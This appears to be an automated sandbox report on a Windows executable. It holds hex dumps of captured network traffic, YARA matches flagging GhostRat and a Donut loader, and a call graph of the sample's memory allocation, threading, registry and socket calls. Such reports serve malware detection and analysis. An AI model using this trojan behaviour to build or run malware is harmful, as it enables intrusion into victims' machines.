                        2024-07-05 05:33:05 UTC8188INData Raw: 3f 88 2d fd 7f c9 76 96 0b fb 37 f0 90 3b 2d 71 16 3c b3 6b fc 84 03 c3 ac f3 4c 2f 6f 73 3d e6 cb 35 4b a6 b9 ee c5 18 84 38 5d 5c 5a 55 d8 13 c2 ff 27 4a c8 46 22 02 c1 9d 9d 43 9b a7 ad b9 a3 18 7e 98 5d 1c 73 0c 43 a6 84 df 7b 7f 7a 7a 4a fb 3d c7 51 e5 63 1c 5e 66 8b 88 59 bd 9d 52 6c fb ef 55 7a c7 ea ea ec e5 52 ae c1 88 e1 88 72 96 4e 20 a2 70 a1 a5 2e 09 03 5d 6f c1 b4 e3 38 72 4e f9 ed ed 0d c7 ba 71 b3 ef 38 06 75 77 c8 a4 ff b7 e8 89 d8 58 2e 3a 26 9d 47 ef 32 6a 62 68 12 7c 91 78 c0 87 c3 03 c8 20 76 22 3f 6e 0c a4 45 6b d1 06 6e 9f 39 3a c3 cf af 19 25 7f fe fc 19 e3 d5 5d b0 b5 74 3e e3 98 52 7d 4c 0f 6a 20 b2 28 45 e6 f6 8e fc 8d 07 45 82 b0 f4 15 e4 67 e2 68 ed 76 f4 f7 38 a3 9f d1 ef ef 6f cf b7 a7 3e cf 40 31 6e a5 0a 01 a6 74 21 5e 22
                        Data Ascii: ?-v7;-q<kL/os=5K8]\ZU'JF"C~]sC{zzJ=Qc^fYRlUzRrN p.]o8rNq8uwX.:&G2jbh|x v"?nEkn9:%]t>R}Lj (EEghv8o>@1nt!^"
                        2024-07-05 05:33:05 UTC8184INData Raw: 45 b4 05 e8 09 c2 4e 14 93 ec 60 d9 f5 f1 ce 64 cc 26 b7 2a 6f 73 fd 0f bb 2b bd 51 f2 20 98 88 b0 84 bd ab cf 52 c4 2d 48 d7 65 5b 8e 02 bc 43 24 46 14 00 57 8f 79 3f 4e cc 9a 16 b4 e3 0f 0f 25 8d 6b e6 b8 4a 01 09 4b 5d f9 45 d0 ab 22 02 0a 53 18 a9 8f 31 03 eb 12 06 bd c2 b4 52 04 ae 7b 1b 4c 04 a5 d2 5a 5d 13 f8 b9 43 13 c8 65 ef 6d 61 0e 4c 05 7f f5 e6 8c 79 09 a7 ec 7a 2f ac 4d 85 46 65 83 d8 43 38 28 65 4c e7 5f 37 7d ad 44 d9 c6 c5 b7 32 c5 96 63 7e 57 fb 36 df dd b3 a2 ab 6d d3 4b 8e c8 25 7c 67 5d 1b 73 3a 5f f5 bd a5 72 5e a9 bf a9 80 24 8d f3 cf 3e 66 76 ee f6 36 13 81 0c aa 3b 4d a6 73 1d 61 88 a0 84 c4 9b 6d 10 7e fe 62 6e d6 2a 9f d6 46 98 43 1d c0 0f 9a c6 92 55 67 9e 9f 6d b4 53 4c 16 15 36 0a 8f 86 2b 54 57 cf d1 1d 24 72 1c 47 de 36 e2
                        Data Ascii: EN`d&*os+Q R-He[C$FWy?N%kJK]E"S1R{LZ]CemaLyz/MFeC8(eL_7}D2c~W6mK%|g]s:_r^$>fv6;Msam~bn*FCUgmSL6+TW$rG6
                        2024-07-05 05:33:05 UTC8184INData Raw: 1f d7 6b 4f ca 23 7a 7c cc f9 46 6b 99 92 f4 de 83 29 e9 fd a0 33 11 19 b2 8d 96 70 7d 91 84 e7 d8 f2 0a 9e d9 e3 24 f8 3c cf cb e5 70 39 b3 f0 d9 53 f0 b8 05 5e 1b f8 e0 f9 45 e0 86 d1 c6 a8 e0 21 04 0b b0 5c 94 0e 02 2b aa 65 cb 92 4c 7f a9 30 8f e8 f7 a0 ed 42 40 97 bb bc d2 09 b6 d6 70 72 af 58 c4 59 1d 8a b6 a1 9f 21 94 c3 98 73 9c b9 13 94 db 75 1a ae f4 39 73 0a 9b 0e 60 01 3a 25 f9 a1 dc 41 c0 d0 92 5b d8 f6 37 3e 08 ad 49 e3 e0 11 33 f7 ac 88 46 e7 8a ad e4 2f 52 6d 16 6f 56 24 49 05 69 90 71 c8 76 c1 e7 9c 95 18 28 89 2c 05 02 b2 79 0c 26 a9 06 0f 1d db bc 7e 8e e9 45 56 01 13 dc 2c f9 16 f2 f8 2f 06 cf 70 a7 bd f7 5c 70 2e 6f f7 9f c0 32 ab 03 85 db 6f 73 de e3 50 3c c7 eb 06 8e b1 25 07 47 0c dc 6e b7 18 e6 cf f9 99 c8 9c 7b 5f 7d e6 8b 0e 03
                        Data Ascii: kO#z|Fk)3p}$<p9S^E!\+eL0B@prXY!su9s`:%A[7>I3F/RmoV$Iiqv(,y&~EV,/p\p.o2osP<%Gn{_}
                        2024-07-05 05:33:05 UTC8184INData Raw: e3 a0 55 f1 5e 25 42 7c 57 a7 ec d7 e5 13 15 72 9a 8d fd a4 1a df 08 3c 73 ba c5 0c e2 d0 1f 91 89 a8 a9 0f 3f f0 7e ff d8 1c 27 03 22 f7 0f 12 a1 38 fb bd cf a7 bc 6f ec 42 d8 e4 fc 3f 69 c0 db fa 1c ea 7c 3b 5a 78 7d 7d c5 99 41 90 3f 82 5a 9f 77 a8 c9 41 2a 25 61 62 1a e9 bd 59 2f c9 f8 6d 71 90 ff b9 9e 4c e4 46 56 4c 09 ef 9c 21 08 7e f6 69 0c d3 0f 34 4a 8e ea e6 d9 d6 fb df 25 bc f6 de 63 e4 ff 48 fe 83 9c 49 ee af 4c e1 b3 97 e6 74 88 b5 73 cc 5b b4 1e 16 11 0b 64 c5 f9 21 32 1f 1f 21 b2 df 58 b5 df e8 01 94 de fb 55 46 62 a5 e7 6d 34 43 19 b6 93 8a 8d ea 19 20 f2 15 76 2b ae 39 5c 67 6c ed bb f0 d4 4a 2c 7c 45 aa c0 b1 53 8a dc ed f4 7e bd b1 b5 b0 ed 39 68 1f a3 08 20 66 b8 89 fb 79 7e c6 51 f6 c5 e5 f8 1c 2f a8 93 51 13 c8 61 6f e5 12 10 a6 d0
                        Data Ascii: U^%B|Wr<s?~'"8oB?i|;Zx}}A?ZwA*%abY/mqLFVL!~i4J%cHILts[d!2!XUFbm4C v+9\glJ,|ES~9h fy~Q/Qao
                        2024-07-05 05:33:05 UTC8184INData Raw: 2f 9c 8a 7b 59 99 12 c7 c8 63 3e cb f6 a0 8d d6 b8 e5 a1 dc c4 3c 57 3e 8d eb 07 41 a2 57 e3 81 30 78 c8 dc 87 33 e8 90 58 a9 83 eb bb 6f 91 0a 4f ca 01 98 39 e7 47 18 84 9e 52 41 bd 4a ca 85 da 3e e7 b5 2e cf a0 d4 4d 08 70 de 99 65 b7 b8 bd 0d 96 e2 12 9f 23 d7 f9 a7 87 d6 bd a2 df 61 b6 52 1c 7a 2c 99 8d 47 da dc 53 58 76 ca 1e a9 dc 16 e1 ed b7 91 b9 b2 82 9e d9 3a 5e 32 ee 52 5a 41 fa 61 fb 65 4d d7 af 9b 21 e3 53 fc 1b fb fc 15 42 bc 05 6c eb 93 f4 09 7e a3 a4 5c 48 ed f3 c4 4d a3 6c 8d 97 55 5c 65 dc 02 37 7b ce 9b ed 05 5d 60 50 d0 5b 4a 75 5f 56 b7 33 b5 a0 8d 65 fe 7c 17 65 81 a6 20 9f 52 fe ab c2 09 b0 10 ec 13 f1 cf d8 af d7 74 90 77 1b ea cb bd e2 52 f8 c6 d5 87 2f 79 c5 f2 16 bf 5d 1a 01 61 2b ff f9 55 02 bc 29 36 9f 55 7d 01 7f af a6 08 99
                        Data Ascii: /{Yc><W>AW0x3XoO9GRAJ>.Mpe#aRz,GSXv:^2RZAaeM!SBl~\HMlU\e7{]`P[Ju_V3e|e RtwR/y]a+U)6U}
                        2024-07-05 05:33:05 UTC8184INData Raw: a4 32 8a 0f dd f3 2e 9c a5 24 9e 1a 57 f0 e0 58 7e c5 1b 01 82 3c ac 74 c7 3f 9d e7 99 98 49 23 05 a4 fb fc f2 ce 73 7e 64 40 44 2d fa 62 51 bc bc bc e4 96 66 e0 81 a3 7e cc d6 8a 6c 9e 31 d0 ed 81 05 16 66 33 a7 26 f8 61 84 43 35 22 cf 12 3f 43 17 dc 72 8b f8 38 d3 24 61 79 5c 22 22 f2 91 9c 61 14 e7 8f 9f b7 1f 2f ff 88 88 fb 3d 1f a0 3d ef f7 fb fb db e7 ae c5 e3 f2 e9 7f 70 10 14 23 33 d6 8f 81 30 5f 6c 65 42 fc 27 fd 6d 3a 58 0a 2c bf d3 0e 17 96 de bd 17 07 68 81 30 d9 a6 d1 ec 2d 12 7c 23 4c 95 b5 df 7a c0 01 02 60 cc 78 a9 08 d7 32 cc 5f ae 8b 07 13 68 31 b3 92 46 c7 ec 34 e0 d5 39 f5 e9 f3 04 0d 4b 46 04 e5 f4 08 da db 1c 01 61 17 7e 76 5a d9 2c cb a1 34 c9 ec 88 fd 00 10 55 ce 55 05 f9 04 67 c1 13 8b 32 de 89 d8 85 11 36 fc 73 7e 6a 72 e5 df 3a
                        Data Ascii: 2.$WX~<t?I#s~d@D-bQf~l1f3&aC5"?Cr8$ay\""a/==p#30_leB'm:X,h0-|#Lz`x2_h1F49KFa~vZ,4UUg26s~jr:
                        2024-07-05 05:33:05 UTC8184INData Raw: fb ba d5 5a 95 f3 78 02 e6 cf d0 42 d3 3f c0 e1 bf d0 fd ae 92 83 f3 4e f8 bb c2 cd 49 f3 f9 77 19 3d c1 b0 7f 67 d8 5d a0 d9 36 55 fa 2e 26 2f cb 26 17 ff 5b ad b5 f4 d5 39 b3 59 21 26 29 54 e6 55 66 85 3c 29 bf b2 8b f8 99 21 f0 08 2c 72 ee df b5 5c ee 6f 85 9f 3d c6 ef f5 d8 65 3a f4 db 5d 4d 56 9b bd 3b 5d 21 90 3b b1 7f 85 1b 65 be 87 0f 7f 9f bf cd 08 cb de 13 7f 95 9f b3 a1 75 ea ff e0 75 09 f1 7f 13 21 67 0a 47 3d 5b eb db 86 e1 42 05 e0 bc ec 34 66 ab 61 4c 32 1a f9 f5 15 7c e1 ea 7f 61 74 de 17 59 59 13 0f 5f a2 0a ea 44 58 65 44 f8 df a2 e4 fe af fd 56 ff cf 0a fc b3 3c e1 f7 96 32 f9 39 c6 e1 35 b6 9e 20 cf 70 f0 ee a6 ff 7b 92 d2 ac 48 ff fe 72 cd d8 fb bc 6e fc 98 f7 49 fa 3c 85 b8 1a b1 63 9f bb 69 fe 6f 32 9b ec d1 b2 f8 5f 1a ad 57 db 43
                        Data Ascii: ZxB?NIw=g]6U.&/&[9Y!&)TUf<)!,r\o=e:]MV;]!;euu!gG=[B4faL2|atYY_DXeDV<295 p{HrnI<cio2_WC
                        2024-07-05 05:33:05 UTC8184INData Raw: 62 d5 e1 b5 c2 7f 9f f3 ad 63 5e 56 da 2b f7 cd 45 ea 00 b1 23 ed c3 62 33 e4 af c2 16 f9 9a 0d ea 85 fe 34 7f fc 45 50 b0 7e 58 ef 3e e8 72 33 7f 54 e8 66 dd 1f 7f e6 76 58 b7 58 c5 f0 b8 87 2b 36 ba cf 3e c7 ad 75 f7 6e 76 0c 12 fa e3 30 93 78 e8 66 76 74 27 bd 28 ad 31 1b 05 1e 06 62 18 5b eb 86 c5 1a f4 64 e0 1c df 33 1c f1 a5 99 a5 85 ff 3c 34 25 ed 95 a6 95 00 1f 8c 8f 79 1e 7b 9a 00 03 3c d2 72 e5 ec 16 98 8a 18 5c 60 37 1e ab 3f 5a d3 15 70 f1 b1 f7 58 e3 05 be 40 49 78 a5 52 a4 4d 87 bb a3 53 01 59 1c b4 a3 67 d4 0f 55 63 c3 99 76 8f ba fb f5 fa 1c d4 c6 22 17 76 c5 70 9b 83 4d 6e ee 87 75 0f dd 8b 27 dd ad 8f e5 39 bd 77 eb 47 3f cc cc ba 5d af d7 1e 0f dd cc fd 29 f7 d0 e4 90 be 7b 0f 7e 42 27 53 bf f7 78 f4 07 ba 3b a9 90 d9 d1 1f fa 75 d8 23
                        Data Ascii: bc^V+E#b34EP~X>r3TfvXX+6>unv0xfvt'(1b[d3<4%y{<r\`7?ZpX@IxRMSYgUcv"vpMnu'9wG?]){~B'Sx;u#
                        2024-07-05 05:33:05 UTC8184INData Raw: e6 dc c9 21 35 9e 7a 26 5c a7 cf 7d 4e 1f 7d 21 31 0a b8 3b 7e 0e 86 0c 7b 2c ba e8 01 54 84 92 55 45 9a f3 d9 97 f2 c1 c9 f1 a4 8d 43 13 c4 4e 8d 14 66 a5 60 f9 95 36 2f c3 04 32 8c 03 78 d5 29 e8 70 3e c9 ec 95 b6 da 3c 85 c0 00 b9 5a 69 5f f2 ca 46 b1 57 be c5 e7 d3 9a f3 eb a8 9c e5 12 9f 2f d7 c7 0a 65 e9 0c f3 ed a5 80 d0 e6 e5 e4 99 8a ac 57 1b 94 1a 0d f4 cb 94 a1 40 c8 96 0b 72 24 bf 6a b4 a5 40 34 d9 d2 6e 11 c0 6c b4 de 84 97 54 44 fc 5d e1 bf 79 9e 85 25 5c 92 ff 2f dd 2f 5e e7 11 80 15 4a 82 83 f0 93 05 0a 3f 09 9e 44 7f 8d fd 00 a7 13 6d 9e 1e 3b 0e dd b5 d7 e7 cc 27 93 2f c1 02 3f 1c c7 b4 e2 9b fb 74 42 ec d5 92 66 e4 cf 36 9c b2 10 f3 a0 73 be 79 c8 86 c1 97 dc cc be 18 1f 8e 79 db 48 59 5f 4a fe 55 fc ce fe 95 68 ee a0 25 40 0c c4 66 e9
                        Data Ascii: !5z&\}N}!1;~{,TUECNf`6/2x)p><Zi_FW/eW@r$j@4nlTD]y%\//^J?Dm;'/?tBf6syyHY_JUh%@f


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:01:33:01
                        Start date:05/07/2024
                        Path:C:\Users\user\Desktop\2IVWAPeiZm.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\2IVWAPeiZm.exe"
                        Imagebase:0x7ff6f6080000
                        File size:11'845'632 bytes
                        MD5 hash:06592A8CA068935D98A5ADA152E3393D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4112489647.000001CFB9530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2285778041.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2629266568.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3349240156.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3706740100.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3726196823.000001CFB9241000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1748764856.000001CFB924D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2820150176.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3368802529.000001CFB923B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1748942831.000001CFB9250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3368874986.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3919845681.000001CFBA3F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2820582683.000001CFBA071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1748764856.000001CFB9216000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1797698380.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3900454177.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1797698380.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3726241114.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3726279645.000001CFBA071000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3900337582.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2629229655.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2820366657.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3181430469.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4113444705.000001CFBA432000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3181505839.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3919777549.000001CFB9246000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2285716468.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4113319605.000001CFBA3BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2629266568.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1925226889.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2453865521.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4113072764.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3919809789.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3006787705.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4112427817.000001CFB9470000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2453718670.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3535968647.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.1925169796.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3181469055.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4111676483.000001CFB9200000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2107170872.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2629153864.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3368840828.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.2107104468.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3368874986.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3181505839.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4113319605.000001CFBA310000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:6.8%
                          Dynamic/Decrypted Code Coverage:86.6%
                          Signature Coverage:26.3%
                          Total number of Nodes:670
                          Total number of Limit Nodes:80
                          execution_graph 31978 1cfb9613d10 31981 1cfb9613d36 31978->31981 31979 1cfb9613d73 31988 1cfb9613d3e 31979->31988 32036 1cfb9610d30 31979->32036 31981->31979 31981->31988 31990 1cfb9613bbc 31981->31990 31984 1cfb9613db8 31986 1cfb9613bbc 70 API calls 31984->31986 31984->31988 31985 1cfb9610d30 2 API calls 31987 1cfb9613dab 31985->31987 31986->31988 31989 1cfb9613bbc 70 API calls 31987->31989 31989->31984 31991 1cfb9613c4b 31990->31991 31992 1cfb9613bce 31990->31992 31994 1cfb9613c9c 31991->31994 32000 1cfb9613c4f 31991->32000 32040 1cfb96142a8 HeapCreate 31992->32040 31996 1cfb9613ca1 31994->31996 31997 1cfb9613cf7 31994->31997 32058 1cfb9616f6c 31996->32058 32012 1cfb9613bd7 31997->32012 32073 1cfb9616a44 31 API calls 2 library calls 31997->32073 32001 1cfb9613c86 32000->32001 32000->32012 32054 1cfb961a890 32 API calls free 32000->32054 32001->32012 32057 1cfb9616788 34 API calls free 32001->32057 32002 1cfb9613be3 _RTC_Initialize 32006 1cfb9613be7 32002->32006 32011 1cfb9613bf3 GetCommandLineA 32002->32011 32005 1cfb9613c7c 32055 1cfb9616788 34 API calls free 32005->32055 32046 1cfb9614300 HeapDestroy 32006->32046 32010 1cfb9613c81 32056 1cfb9614300 HeapDestroy 32010->32056 32047 1cfb961acfc 36 API calls 2 library calls 32011->32047 32012->31979 32013 1cfb9613cb5 __doserrno 32013->32012 32016 1cfb9613cd7 32013->32016 32017 1cfb9613ced 32013->32017 32063 1cfb96167b0 32016->32063 32068 1cfb9611e00 32017->32068 32018 1cfb9613c05 32048 1cfb961a5bc 36 API calls 2 library calls 32018->32048 32022 1cfb9613cde GetCurrentThreadId 32022->32012 32023 1cfb9613c11 32024 1cfb9613c15 32023->32024 32025 1cfb9613c1c 32023->32025 32049 1cfb9616788 34 API calls free 32024->32049 32050 1cfb961ac04 42 API calls 2 library calls 32025->32050 32028 1cfb9613c21 32029 1cfb9613c35 32028->32029 32051 1cfb961a904 41 API calls 5 library calls 32028->32051 32035 1cfb9613c39 32029->32035 32053 1cfb961a890 32 API calls free 32029->32053 32032 1cfb9613c2a 32032->32029 32052 1cfb9614440 37 API calls 2 library calls 32032->32052 32033 1cfb9613c49 32033->32024 32035->32012 32037 1cfb9610d74 32036->32037 32038 1cfb9610d38 32036->32038 32037->31984 32037->31985 32038->32037 32039 1cfb9610d42 CreateThread WaitForSingleObject 32038->32039 32039->32037 32041 1cfb96142d0 GetVersion 32040->32041 32042 1cfb9613bd3 32040->32042 32043 1cfb96142f4 32041->32043 32044 1cfb96142da HeapSetInformation 32041->32044 32042->32012 32045 1cfb9616a84 36 API calls 2 library calls 32042->32045 32043->32042 32044->32043 32045->32002 32046->32012 32047->32018 32048->32023 32049->32006 32050->32028 32051->32032 32052->32029 32053->32033 32054->32005 32055->32010 32056->32001 32057->32012 32059 1cfb9616f91 32058->32059 32061 1cfb9616fd1 32059->32061 32062 1cfb9616faf Sleep 32059->32062 32074 1cfb961cb00 32059->32074 32061->32013 32062->32059 32062->32061 32084 1cfb961b128 32063->32084 32065 1cfb9616809 32066 1cfb961b128 _lock 31 API calls 32065->32066 32067 1cfb9616828 __doserrno 32066->32067 32067->32022 32069 1cfb9611e05 HeapFree 32068->32069 32072 1cfb9611e25 free 32068->32072 32070 1cfb9611e20 32069->32070 32069->32072 32092 1cfb9612178 31 API calls __doserrno 32070->32092 32072->32012 32073->32012 32075 1cfb961cb15 32074->32075 32080 1cfb961cb32 32074->32080 32076 1cfb961cb23 32075->32076 32075->32080 32082 1cfb9612178 31 API calls __doserrno 32076->32082 32077 1cfb961cb4a HeapAlloc 32079 1cfb961cb28 32077->32079 32077->32080 32079->32059 32080->32077 32080->32079 32083 1cfb961499c DecodePointer 32080->32083 32082->32079 32083->32080 32085 1cfb961b146 32084->32085 32086 1cfb961b157 32084->32086 32090 1cfb961b040 31 API calls 7 library calls 32085->32090 32088 1cfb961b14b 32088->32086 32091 1cfb961469c 31 API calls 2 library calls 32088->32091 32090->32088 32092->32072 32463 1cfb960ca70 32464 1cfb960ca9f RegOpenKeyExW 32463->32464 32466 1cfb960caf9 32463->32466 32465 1cfb960cad3 RegQueryValueExW 32464->32465 32464->32466 32465->32466 32093 1cfb9603850 GetCurrentThreadId 32094 1cfb960387c 32093->32094 32106 1cfb9601080 32094->32106 32096 1cfb96038c5 32097 1cfb9601080 33 API calls 32096->32097 32098 1cfb96038ff 32097->32098 32099 1cfb9601080 33 API calls 32098->32099 32100 1cfb9603946 memcpy_s 32099->32100 32114 1cfb9603a50 32100->32114 32104 1cfb9603a15 GetCurrentThreadId 32105 1cfb9603a25 32104->32105 32107 1cfb9601096 32106->32107 32108 1cfb960108e 32106->32108 32129 1cfb9623184 32107->32129 32108->32096 32111 1cfb96010e5 memcpy_s 32112 1cfb9601112 32111->32112 32113 1cfb9601104 VirtualFree 32111->32113 32112->32096 32113->32112 32118 1cfb9603a88 32114->32118 32119 1cfb9603ae1 32114->32119 32115 1cfb96039f6 32120 1cfb9601140 32115->32120 32116 1cfb9603aa0 send 32116->32118 32117 1cfb9603af0 send 32117->32115 32117->32119 32118->32115 32118->32116 32118->32119 32119->32115 32119->32117 32121 1cfb9601150 32120->32121 32122 1cfb960115a 32121->32122 32123 1cfb9623184 31 API calls 32121->32123 32122->32104 32124 1cfb960117f 32123->32124 32125 1cfb9601199 VirtualAlloc 32124->32125 32126 1cfb960118c 32124->32126 32127 1cfb96011c3 memcpy_s 32125->32127 32126->32104 32128 1cfb96011d9 VirtualFree 32127->32128 32128->32104 32130 1cfb96010bd VirtualAlloc 32129->32130 32131 1cfb96231c0 32129->32131 32130->32111 32131->32130 32133 1cfb96247f0 31 API calls 4 library calls 32131->32133 32133->32130 32134 7ff6f6083b8c 32152 7ff6f60842a4 GetModuleHandleW 32134->32152 32137 7ff6f6084118 6 API calls 32140 7ff6f6083a64 _RTC_Initialize __scrt_acquire_startup_lock __scrt_release_startup_lock 32137->32140 32140->32137 32141 7ff6f60842a4 GetModuleHandleW 32140->32141 32142 7ff6f6083ac3 32140->32142 32143 7ff6f6084260 32140->32143 32146 7ff6f6081bc0 32140->32146 32154 7ff6f6083ff4 32140->32154 32141->32140 32144 7ff6f60846e4 32143->32144 32145 7ff6f6084277 